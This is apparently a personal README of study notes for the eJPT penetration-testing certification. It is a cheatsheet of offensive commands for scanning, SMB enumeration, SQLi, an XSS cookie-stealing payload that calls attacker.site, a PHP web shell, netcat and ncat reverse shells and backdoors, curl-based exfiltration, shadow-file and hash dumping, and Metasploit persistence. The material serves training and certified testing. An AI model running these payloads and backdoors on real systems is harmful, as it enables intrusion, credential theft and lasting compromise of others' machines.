/eJPT-notes

Notes I took while preparing for eJPT certification by eLearn Security (passed 19/20)

Note These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.

Info about eJPT certification here.
Read also my blog post about eJPT certification.

Exam setup

  • Download OPVN configuration file
  • sudo openvpn file.ovpn
  • Enter username and password
  • CTRL+Z
  • bg

Add a route in IP routes:

Linux:

ip route <destination network> via <gateway>

Show IP addresses:

Linux:

ip addr

Show CAM table:

Linux:

ip neighbor

or

ifconfig

Show Listening ports (both UDP and TCP):

Linux:

netstat -tunp

Windows:

netstat -ano

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>

To intercept the traffic between 192.168.4.11 and 192.168.4.16

arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16

Ping sweeping

fping -a -g 192.168.1.0/24 2> /dev/null

or

fping -a -f targets.txt 2>/dev/null

or

nmap -sn 192.168.1.0/24

or

nmap -sn -iL networks.txt

OS Fingerprinting

nmap -Pn -O <target(s)>

Port Scanning

nmap...Then remember:

  • -sT: TCP Connect Scan, usually recorded in application logs
  • -sS: TCP Syn Scan, usually not recorded in app. logs (well configured IDSs do)
  • -sV: Version Detection Scan, TCP Connect Scan + Banner Detection

Example:

nmap -sS -p 1-100,443 192.168.1.13,14

Tip: Use --reason to show the explanation of why a port is marked open or closed
Tip: Use --open to show only open, open|filtered, and unfiltered ports.

TCP Quick Scan

nmap -sV -sC 192.168.1.1

TCP Full Scan

nmap -sV -sC -p- 192.168.1.1

UDP Quick Scan

nmap -sV -sU 192.168.1.1

Get info on a particular service:

nmap -sC -p 27017 192.168.1.13 | less

Masscan

Check if masscan is properly installed:

masscan --regress

Scan example:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24

If you want to use a VPN connection (configure the options properly):

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1

In order to save the configuration into a file:

masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf

Use the configuration file as input:

masscan -c masscan.conf

Web Fingerprinting

Using netcat:

nc 192.168.1.2 80
HEAD / HTTP/1.1

Using openssl:

openssl s_client -connect target.site:443
HEAD / HTTP/1.1

Using httprint:

httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt

Directory/Files enumeration with dirb

Default scan:

dirb http://google.com

Using a custom wordlist:

dirb http://google.com /usr/share/dirb/wordlists/small.txt

Using cookies:

dirb http://google.com -c "COOKIE:XYZ"

Using Basic Authentication:

dirb http://google.com -u "admin:password"

Using Custom Header:

dirb http://google.com -H "MyHeader: MyContent"

Disable recursive enumeration:

dirb http://google.com -r

Set Speed delay in milliseconds:

dirb http://google.com -z 1000

Specify extensions:

dirb http://google.com -X ".php,.bak"

Save results in a file:

dirb http://google.com -o results.txt

Google Dorks

  • site: Include only results on a given hostname
  • intitle: Filters according to the title of a page
  • inurl: Similar to intitle but works on the URL of a resource
  • filetype: Filters by using the file extension of a resource
  • AND, OR, | Use logical operators to combine your expressions
  • - Filter out a keyword or a command's result

Example: -inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf
See also the Google Hacking Database

XSS

Payload: <script>var i = new Image(); i.src = "http://attacker.site/log.php?q+"+document.cookie;</script>
Server:

<?php
$filename="/tmp/log.txt";
$fp=fopen($filename, 'a');
$cookie=$_GET['q'];
fwrite($fp, $cookie);
fclose($fp);
?>

SQLi

Payloads:

  • ' OR 'a'='a
  • ' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a
  • ' OR substr(user(),1,1) = 'a
  • ' UNION SELECT user(); -- -

Sqlmap:

  • sqlmap -u 'http://victim.site/view.php?id=1141' --cookie "PHPSESSID=m42ba4etbktcktvjadirnsqqg4;
  • sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U
  • sqlmap -u 'http://victim.site/view.php?id=1141' --banner
  • sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries
  • sqlmap -u 'http://victim.site/view.php?id=1141' --users
  • sqlmap -u 'http://victim.site/view.php?id=1141' --dbs
  • sqlmap -u 'http://victim.site/view.php?id=1141' --tables
  • sqlmap -u 'http://victim.site/view.php?id=1141' -D <db-name> -T <table-name>
  • sqlmap -u 'http://victim.site/view.php?id=1141' --current-db <db-name> --columns
  • sqlmap -u 'http://victim.site/view.php?id=1141' --current-db <db-name> --dump
  • sqlmap -u 'http://victim.site/login.php' --data='user=a&pass=a' -p user --technique=B --banner
  • sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner

Tip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.

Misconfigured PUT method

wc -m payload.php
20 payload.php
nc victim.site 80
PUT /payload.php HTTP/1.1
Host: victim.site
Content-type: text/html
Content-length: 20

<?php phpinfo(); ?>

Uploading PHP shell

<?php
if (isset($_GET['cmd']))
{
    $cmd = $_GET['cmd'];
    echo '<pre>';
    $result = shell_exec($cmd);
    echo $result;
    echo '</pre>';
}
?>

Authentication Cracking with Hydra

  • hydra -U http-post-form (get info on a module)
  • hydra -L users.txt -P passwords.txt <service://server> <options>
  • hydra crackme.site http-post-form "/login.php:user=^USER^&pwd=^PASS^:invalid credentials" -L users.txt -P passwords.txt -f -V
  • hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V

Authentication Cracking with nmap

  • nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local

Authentication Cracking with metasploit

  • use auxiliary/scanner/ssh/ssh_login
  • set RHOSTS demo.ine.local
  • set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
  • set STOP_ON_SUCCESS true
  • set verbose true
  • exploit

Password cracking using John the Ripper

  • unshadow /etc/passwd /etc/shadow > crackme.txt
  • john --incremental -users:<users-list> crackme.txt (bruteforce, don't use it!)
  • john --show crackme.txt
  • john --wordlist=<wordlist-filename> crackme.txt
  • john --wordlist=<wordlist-filename> --rules crackme.txt (enable word mangling)

Cracking Password of Microsoft Word file using John the Ripper

  • /usr/share/john/office2john.py MS_Word_Document.docx > hash
  • john --wordlist=passwds.txt hash

Password cracking using Hashcat

  • hashcat -m 0 -a 0 -D2 example0.hash example.dict (m = 0 is MD5)
  • hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule

Windows Shares

Interesting shares:

  • \\ComputerName\C$ lets an administrator access a volume (C$, D$, E$...)
  • \\ComputerName\admin$ points to the Windows installation directory

Enumerating shares (Windows):

  • nbtstat -A 192.168.1.11
  • net view 192.168.1.11
  • net use \\192.168.1.11\IPC$ '' /u:'' (null session attack)
  • enum -S 192.168.1.11 (enum)
  • enum -U 192.168.1.11
  • enum -P 192.168.1.11

Enumerating shares (Linux):

  • nmblookup -A 192.168.1.11
  • smbclient -L //192.168.1.11 -N
  • smbclient //192.168.1.11/IPC$ -N (null session attack)
  • enum4linux -n 192.168.1.11
  • enum4linux -P 192.168.1.11
  • enum4linux -S 192.168.1.11
  • enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11
  • enum4linux -a 192.168.1.11
  • smbmap -H demo.ine.local
  • nmap -sU -sV -p137,138 demo.ine.local
  • nmap -script=smb-enum-shares -Pn 192.168.1.11
  • nmap -script=smb-enum-users -Pn 192.168.1.11
  • nmap -script=smb-brute -Pn 192.168.1.11
  • nmap --script smb-vuln-* -Pn 192.168.1.11
  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11

Metasploit

msfconsole
show -h
search <keyword(s)>
use <path-to-exploit>
show options
set <option-name> <option-value> 
exploit

Tip: Use show payloads when an exploit is selected to show only the available payloads for that exploit
Tip: Use info when an exploit is selected to get information about the exploit
Tip: Use back when an exploit is selected to return to unselect it

Meterpreter

Inside metasploit:

  • search meterpreter
  • set payload <payload-path>
  • background
  • sessions -l (list the sessions)
  • sessions -i <session-id> (resume a background session)
  • sysinfo
  • ifconfig
  • route
  • getuid
  • getsystem
  • You can use Unix-like commands like pwd, ls, cd...
  • download <filename> <location>
  • upload <filename> <location>
  • shell
  • hashdump
  • run autoroute -h
  • run autoroute -s 192.130.110.0 -n 255.255.255.0 (pivoting towards that network)

Tip: help shows an amazing list of available commands divided by category
Tip: If getsystem fails, use use exploit/windows/local/bypassuac
Tip: ps -U SYSTEM shows only the processes with SYSTEM privileges
Tip: Use post/windows/gather/hashdump to dump the passwords DB and save it for an offline cracking session

Pivoting with Meterpreter

Let's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.
Our IP: 192.180.40.2
Compromised host: 192.180.40.3
Unreachable machine: 192.130.110.3

  • meterpreter > run autoroute -s 192.130.110.0 -n 255.255.255.0 1
  • background
  • msf > route

If we want to scan the 192.130.110.0/24 network we can use:

msf > use auxiliary/scanner/portscan/tcp
msf > set PORTS 80, 8080, 445, 21, 22, ...
msf > set RHOSTS 192.130.110.1-254
msf > exploit

If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. 192.130.110.3:21) we can use:

  • sessions 1 (back to meterpreter session)
  • portfwd add -l 1234 -p 21 -r 192.130.110.3 (forwarding remote machine port 21 to the local machine port 1234)
  • portfwd list
  • background

Then if we want to scan the service we can use nmap:

msf > nmap -sS -sV -p 1234 localhost

Reverse shell with Netcat

Attacker:

nc -lvp 8888 -e /bin/bash

Target (the IP of the attacker):

nc -v 192.168.1.1 8888

Generate a reverse shell payload with msfvenom

msfvenom --list payloads | grep <keyword>
msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
chmod +x reverse443

Note: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection

Blind Remote Code Execution

Target (Use the Attacker IP)

curl http://192.168.1.130:53/`whoami`

or

curl http://192.168.1.130:53/`id | base64`

Attacker:

nc -lvp 53

Tip: You can also create a reverse shell with msfvenom and let the target download it

Enumerating users history with meterpreter

  • background
  • use post/linux/gather/enum_users_history
  • set SESSION 1
  • exploit

Data exfiltration with Netcat

Receiver:

nc -lvnp 8888 > received.txt

Sender (the IP of the receiver):

cat message.txt | nc -v 192.168.1.1 8888

Backdoor using ncat

Victim:

ncat -l -p 5555 -e cmd.exe

Attacker (the IP of the victim):

ncat 192.168.1.66 5555

Reverse Backdoor using ncat

Attacker:

ncat -l -p 5555 -v

Victim (the IP of the attacker):

ncat -e cmd.exe 192.168.1.66 5555

Tip: For persistent reverse backdoor use the registry key Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Reverse Backdoor using Metasploit

msfconsole
use exploit/windows/local/s4u_persistence
show options
sessions
set session <session-id>
set trigger logon
set payload windows/meterpreter/reverse_tcp
set lhost <local-ip>
set lport 1234
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost <local-ip>
set lport 1234
exploit
sysinfo
ps
help

Tip: once we get a shell we can use screenshot to get a picture of what the victim is seeing on the Desktop
Tip: once we get a shell we can use download filename location to save the filename in the specified location on our machine
Tip: Same syntax as above but use upload to upload files
Tip: Use getsystem to gain the highest privilege (i.e. SYSTEM) on the compromised machine and getuid to check if it actually worked.

Upgrading a simple shell

bash -i
python -c 'import pty; pty.spawn("/bin/sh")'

Maintaining access using Metasploit (Windows)

Inside a meterpreter session:

  • background
  • use exploit/windows/local/persistence_service
  • show options
  • set SESSION <session-id>
  • exploit

Use the backdoor:

  • background
  • sessions -K
  • use exploit/multi/handler
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST <your-ip>
  • set LPORT 4444
  • exploit

Note: The <session-id> is the one you can read when you type background
Note: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.

Pivoting using a SOCKS Proxy

You have access to a compromised host and only from there you can access another machine. That machine exposes a web server, in order to access it from your computer set up a SOCKS proxy.

Add the route to the unreachable network using autoroute or route.

msf > use auxiliary/server/socks_proxy
msf > set VERSION 4a
msf > set SRVPORT 9050
msf > run -j
root@INE:~# proxychains nmap ...

Then you can also setup firefox in order to send request using the SOCKS proxy v4 at 127.0.0.1:9050.

Dump AutoLogin stored credentials

Inside a meterpreter session:

  • migrate -N explorer.exe
  • background
  • use post/windows/gather/credentials/windows_autologin
  • set SESSION <session-id>
  • exploit

If you find an error, just open an issue.

Don't text/mail me looking for exam solutions.